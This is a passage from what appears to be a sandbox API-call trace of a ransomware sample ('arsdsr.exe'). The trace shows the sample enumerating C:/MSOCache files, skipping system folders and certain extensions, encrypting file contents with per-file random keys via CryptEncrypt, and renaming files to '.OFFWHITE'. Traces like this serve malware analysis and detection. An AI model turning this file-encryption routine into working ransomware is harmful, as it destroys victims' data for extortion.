hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1988) returned 1 [0085.305] GetProcessHeap () returned 0x500000 [0085.305] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0085.305] GetProcessHeap () returned 0x500000 [0085.305] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0085.305] GetProcessHeap () returned 0x500000 [0085.305] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0085.305] GetProcessHeap () returned 0x500000 [0085.305] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0085.305] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.305] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.305] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0085.305] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.305] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.305] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0085.305] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.305] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.305] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0085.305] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.305] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.305] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0085.306] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x7c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.306] SetLastError (dwErrCode=0x0) [0085.306] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0085.337] GetLastError () returned 0x0 [0085.337] GetLastError () returned 0x0 [0085.337] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x8c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.337] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0085.337] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x9c4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.337] WriteFile (in: hFile=0x21c, lpBuffer=0x547bf8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547bf8*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0085.337] GetProcessHeap () returned 0x500000 [0085.337] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x7c4) returned 0x546980 [0085.337] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.337] ReadFile (in: hFile=0x21c, lpBuffer=0x546980, nNumberOfBytesToRead=0x7c4, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesRead=0x295e540*=0x7c4, lpOverlapped=0x0) returned 1 [0085.338] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.338] WriteFile (in: hFile=0x21c, lpBuffer=0x546980*, nNumberOfBytesToWrite=0x7c4, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesWritten=0x295e54c*=0x7c4, lpOverlapped=0x0) returned 1 [0085.338] GetProcessHeap () returned 0x500000 [0085.338] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546980 | out: hHeap=0x500000) returned 1 [0085.338] CloseHandle (hObject=0x21c) returned 1 [0085.339] GetProcessHeap () returned 0x500000 [0085.339] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0085.339] GetProcessHeap () returned 0x500000 [0085.339] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0085.339] GetProcessHeap () returned 0x500000 [0085.339] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0085.339] GetProcessHeap () returned 0x500000 [0085.339] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0085.339] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" [0085.339] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0085.339] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0085.340] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e0d4a0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x7c4, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0085.340] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0085.340] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0085.340] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0085.340] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0085.340] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0085.340] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0085.340] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0085.340] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0085.340] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0085.340] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0085.340] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0085.340] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0085.340] lstrcmpiW (lpString1="{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0085.340] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0085.340] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{90140000-00B4-0409-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C" [0085.340] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\" [0085.341] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\" [0085.341] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*" [0085.341] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0085.345] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.345] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0085.345] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0085.345] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.345] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1 [0085.345] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2=".") returned 1 [0085.345] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="..") returned 1 [0085.345] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="...") returned 1 [0085.345] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="windows") returned -1 [0085.345] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="$recycle.bin") returned 1 [0085.345] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="rsa") returned -1 [0085.345] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="ntuser.dat") returned 1 [0085.345] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="programdata") returned 1 [0085.345] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="appdata") returned 1 [0085.345] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="program files") returned 1 [0085.345] lstrcmpiW (lpString1="ProjectMUI.msi", lpString2="program files (x86)") returned 1 [0085.345] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\" [0085.345] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", lpString2="ProjectMUI.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" [0085.345] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.345] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.353] PathFindExtensionW (pszPath="ProjectMUI.msi") returned=".msi" [0085.353] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0085.353] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0085.353] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0085.354] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0085.354] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0085.354] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0085.354] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0085.354] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0085.354] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0085.354] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0085.354] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0085.354] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0085.354] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0085.354] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0085.354] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0085.354] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2b7b0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30a2b7b0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="ProjectMUI.xml", cAlternateFileName="PROJEC~1.XML")) returned 1 [0085.354] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2=".") returned 1 [0085.354] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="..") returned 1 [0085.354] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="...") returned 1 [0085.354] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="windows") returned -1 [0085.354] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="$recycle.bin") returned 1 [0085.354] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="rsa") returned -1 [0085.354] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="ntuser.dat") returned 1 [0085.354] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="programdata") returned 1 [0085.354] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="appdata") returned 1 [0085.354] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="program files") returned 1 [0085.354] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="program files (x86)") returned 1 [0085.354] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\" [0085.354] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", lpString2="ProjectMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" [0085.354] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.354] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.354] PathFindExtensionW (pszPath="ProjectMUI.xml") returned=".xml" [0085.354] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0085.354] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0085.354] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0085.354] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0085.355] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0085.355] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0085.355] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0085.355] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0085.355] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0085.355] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0085.355] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0085.355] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0085.355] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0085.355] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0085.355] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0085.355] lstrcmpiW (lpString1="ProjectMUI.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0085.355] GetProcessHeap () returned 0x500000 [0085.355] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547c08 [0085.355] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0085.356] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1452) returned 1 [0085.356] GetProcessHeap () returned 0x500000 [0085.356] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0085.356] GetProcessHeap () returned 0x500000 [0085.356] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0085.356] GetProcessHeap () returned 0x500000 [0085.356] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0085.356] GetProcessHeap () returned 0x500000 [0085.356] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0085.356] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.356] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.356] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0085.356] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.356] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.356] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0085.356] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.356] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.357] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0085.357] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.357] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.357] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0085.357] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x5ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.357] SetLastError (dwErrCode=0x0) [0085.357] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0085.376] GetLastError () returned 0x0 [0085.376] GetLastError () returned 0x0 [0085.376] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x6ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.376] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0085.376] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x7ac, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.376] WriteFile (in: hFile=0x21c, lpBuffer=0x547c08*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547c08*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0085.376] GetProcessHeap () returned 0x500000 [0085.376] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x5ac) returned 0x546980 [0085.376] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.376] ReadFile (in: hFile=0x21c, lpBuffer=0x546980, nNumberOfBytesToRead=0x5ac, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesRead=0x295e540*=0x5ac, lpOverlapped=0x0) returned 1 [0085.377] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.377] WriteFile (in: hFile=0x21c, lpBuffer=0x546980*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesWritten=0x295e54c*=0x5ac, lpOverlapped=0x0) returned 1 [0085.377] GetProcessHeap () returned 0x500000 [0085.377] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546980 | out: hHeap=0x500000) returned 1 [0085.377] CloseHandle (hObject=0x21c) returned 1 [0085.378] GetProcessHeap () returned 0x500000 [0085.378] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0085.378] GetProcessHeap () returned 0x500000 [0085.378] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0085.378] GetProcessHeap () returned 0x500000 [0085.378] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0085.378] GetProcessHeap () returned 0x500000 [0085.378] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0085.378] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" [0085.378] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.OFFWHITE" [0085.378] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.offwhite")) returned 1 [0085.379] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30306de0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30306de0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b7cde0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x7e1dcd, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="ProjLR.cab", cAlternateFileName="")) returned 1 [0085.379] lstrcmpiW (lpString1="ProjLR.cab", lpString2=".") returned 1 [0085.379] lstrcmpiW (lpString1="ProjLR.cab", lpString2="..") returned 1 [0085.379] lstrcmpiW (lpString1="ProjLR.cab", lpString2="...") returned 1 [0085.379] lstrcmpiW (lpString1="ProjLR.cab", lpString2="windows") returned -1 [0085.379] lstrcmpiW (lpString1="ProjLR.cab", lpString2="$recycle.bin") returned 1 [0085.379] lstrcmpiW (lpString1="ProjLR.cab", lpString2="rsa") returned -1 [0085.379] lstrcmpiW (lpString1="ProjLR.cab", lpString2="ntuser.dat") returned 1 [0085.379] lstrcmpiW 